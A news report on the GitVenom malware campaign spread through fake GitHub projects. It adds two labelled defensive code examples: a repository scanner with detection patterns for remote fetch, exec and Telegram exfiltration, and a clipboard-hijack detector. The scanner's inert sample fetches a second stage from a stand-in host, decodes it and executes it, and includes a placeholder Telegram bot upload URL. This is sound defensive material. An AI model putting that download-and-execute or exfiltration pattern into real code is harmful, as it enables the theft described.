CAS Corporation reported on the 28th that it had discovered a multi-stage malware campaign called 'GitVenom' on GitHub. The malware was used to steal personal data and Bitcoin worth $485,000, and analysis showed that it spread through fake projects uploaded to GitHub.
The Global Research and Analysis Team (GReAT) of CAS Corporation confirmed several infected projects, including an Instagram account automation tool, a Telegram bot for managing Bitcoin (BTC) wallets, and a crack tool for the game Valorant. All of these projects were fake, and the attacker caused harm by intercepting cryptocurrency wallet addresses from the clipboard or by stealing financial data. The investigation found that the attackers stole 5 Bitcoins. The infected repositories were used worldwide, with many cases of damage in Brazil, Turkey, and Russia in particular.
The malicious repositories uploaded to GitHub spread by using project descriptions that appear to have been generated by AI to enhance their credibility. Once a victim executes the code from one of those repositories, the device is infected with malware that allows the attacker to control it remotely.
This malware was written in various programming languages, including Python, JavaScript, C, C++, and C#. The infected projects download and execute malicious components from GitHub repositories and have the capability to collect the victim's passwords, bank account information, stored credentials, cryptocurrency wallet data, and browsing history. The stolen data is compressed into a .7z archive and sent to the attacker via Telegram.
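The behaviours described above (a decoy project that fetches and executes a second stage at run time, then stages stolen data for Telegram) leave recognisable traces in source code, and the advice in this report is to look before running. The following is an added example, not code from the report or from CAS Corporation, of a small static triage scanner a developer could run over a downloaded repository before executing anything. The rule names, the thresholds and the sample source file are constructed for illustration; the sample contains no real payload and an invalid placeholder URL.

```python
import re
from collections import defaultdict

# One regex per behaviour worth a human look. Names are illustrative and tuned for
# Python/JavaScript sources; extend them for the languages in your own repositories.
RISK_RULES = {
    "remote_fetch":   re.compile(r"\b(urlopen|requests\.(get|post)|fetch|wget|curl)\b"),
    "dynamic_exec":   re.compile(r"\b(exec|eval|Function)\s*\("),
    "payload_decode": re.compile(r"\b(b64decode|fromhex|decompress|atob)\b"),
    "process_spawn":  re.compile(r"\b(subprocess\.(Popen|run|call)|os\.system|child_process)\b"),
    "telegram_api":   re.compile(r"api\.telegram\.org"),
    "archive_7z":     re.compile(r"\.7z\b|py7zr|7z\s+a\b"),
    "clipboard":      re.compile(r"\b(pyperclip|clipboard|GetClipboardData|SetClipboardText)\b", re.I),
}
# A quoted run of 200+ base64-alphabet characters is an encoded blob, not configuration.
BLOB_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")
# Very long lines push code past the right edge of an editor; treat them as worth a look.
LONG_LINE = 2000


def scan_source(text):
    """Return {rule_name: [line numbers]} for every rule that fires on the given source text."""
    findings = defaultdict(list)
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RISK_RULES.items():
            if rx.search(line):
                findings[name].append(lineno)
        if BLOB_RE.search(line) or len(line) > LONG_LINE:
            findings["long_encoded_blob"].append(lineno)
    return dict(findings)


def risk_verdict(findings):
    """Combine single rule hits into the behaviours the GitVenom report describes."""
    verdicts = []
    keys = set(findings)
    if {"remote_fetch", "dynamic_exec"} <= keys or {"payload_decode", "dynamic_exec"} <= keys:
        verdicts.append("download-and-execute / staged payload")
    if "telegram_api" in keys and ("archive_7z" in keys or "remote_fetch" in keys):
        verdicts.append("possible exfiltration over Telegram")
    if "clipboard" in keys:
        verdicts.append("clipboard access (check for address rewriting)")
    return verdicts


# Constructed sample: a decoy "automation tool" with a hidden second stage. Inert on purpose.
SAMPLE_SOURCE = """\
import base64
import urllib.request

def automate_instagram(user):      # decoy feature advertised in the README
    print("automating", user)

# hidden second stage: fetched at run time and run in memory
blob = urllib.request.urlopen("https://example.invalid/stage2.txt").read()
exec(base64.b64decode(blob))
REPORT_URL = "https://api.telegram.org/bot<TOKEN>/sendDocument"
"""

if __name__ == "__main__":
    hits = scan_source(SAMPLE_SOURCE)
    for rule, lines in sorted(hits.items()):
        print(f"{rule:18s} lines {lines}")
    for verdict in risk_verdict(hits):
        print("VERDICT:", verdict)
```

Run it over every file in a freshly cloned repository and read the flagged lines by hand; a hit is a reason to look, not proof of malice, since legitimate tools also download and decode data. The combined verdicts are what separate a normal project from one that behaves like the fake projects described here.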
Additionally, the downloaded malware includes a clipboard hijacker function, which automatically changes the cryptocurrency wallet address to an address controlled by the attacker when the victim copies it. In fact, it has been confirmed that approximately 5 BTC was deposited into the Bitcoin wallet used by the attacker as of November 2024.
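A clipboard hijacker of the kind described here has one observable property: the wallet address the user copied turns into a different address almost immediately, long before a person could have copied a second one. The following is an added example, not code from the report, of detection logic that uses that timing heuristic over a sequence of clipboard snapshots. The address patterns are format checks only (no checksum validation), the two-second window and the three address families are assumptions, and the timeline and addresses are constructed for the example.

```python
import re
from dataclasses import dataclass

# Format heuristics only: enough to tell "looks like a wallet address" from ordinary text.
# Assumption: these three families are the ones the guard cares about.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{8,87}$"),
    "eth":        re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text):
    """Return the address family the text matches, or None for ordinary clipboard content."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


@dataclass(frozen=True)
class Snapshot:
    t: float      # seconds since the monitor started
    value: str    # clipboard text observed at that moment


def detect_substitutions(snapshots, window_s=2.0):
    """Flag an address being replaced by a different address within window_s of first appearing.

    A person copying two addresses takes seconds; a hijacker rewrites the clipboard right after
    the copy. Repeated identical snapshots keep the timestamp at which the value first appeared.
    Returns one alert dict per suspicious transition.
    """
    alerts = []
    current, first_seen = None, None
    for snap in snapshots:
        if snap.value == current:
            continue                      # same content as before: nothing changed
        old_kind = address_kind(current) if current is not None else None
        new_kind = address_kind(snap.value)
        if old_kind and new_kind and (snap.t - first_seen) <= window_s:
            alerts.append({
                "t": snap.t,
                "from": current,
                "to": snap.value,
                "age_s": round(snap.t - first_seen, 3),
            })
        current, first_seen = snap.value, snap.t
    return alerts


# Constructed addresses: format-valid strings built from the bech32/base58 alphabets,
# not real wallets.
ADDR_USER = "bc1qzry9x8gf2tvdw0s3jn54khce6mua7lqpzry9x8gf"
ADDR_ATTACKER = "bc1q0s3jn54khce6mua7lqpzry9x8gf2tvdw0s3jn54kh"
ADDR_LATER = "1AbCdEfGhJkLmNpQrStUvWxYz23456789a"

# Constructed timeline of clipboard polls (one every few hundred milliseconds in practice).
CONSTRUCTED_TIMELINE = [
    Snapshot(0.0, "meeting notes"),
    Snapshot(0.5, "meeting notes"),
    Snapshot(10.0, ADDR_USER),        # user copies the deposit address they intend to pay
    Snapshot(10.3, ADDR_ATTACKER),    # clipboard rewritten 300 ms later
    Snapshot(11.0, ADDR_ATTACKER),
    Snapshot(95.0, ADDR_LATER),       # much later the user copies another address: benign
]

if __name__ == "__main__":
    for alert in detect_substitutions(CONSTRUCTED_TIMELINE):
        print(f"t={alert['t']}: address replaced after {alert['age_s']}s")
        print(f"  copied: {alert['from']}")
        print(f"  now:    {alert['to']}")
```

To turn this into a live guard, feed `detect_substitutions` from a polling loop that reads the system clipboard (for example with a clipboard library of your choice) and raise a desktop notification on any alert. The same comparison is what the report's advice amounts to when done by hand: check the pasted address against the one you copied, every time, before sending.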
Heo Yoon, the head of CAS Corporation's Korea branch, noted that "the GitVenom campaign shows that the strategies of cybercriminals who exploit GitHub to distribute sophisticated multi-level malware are becoming increasingly advanced," and added, "Developers, gamers, and cryptocurrency investors must thoroughly verify third-party code before execution, and organizations should also implement strong security controls to detect and block unauthorized code execution."
Georgy Kuchelin, a security researcher at CAS Corporation's GReAT, stated that "code-sharing platforms like GitHub are used by millions of developers worldwide, so there is a high likelihood that threat actors will continue to attempt infections using fake software in the future," and advised, "Before executing third-party code, it is essential to thoroughly analyze what the code does to identify fake projects and prevent malicious code from compromising the development environment."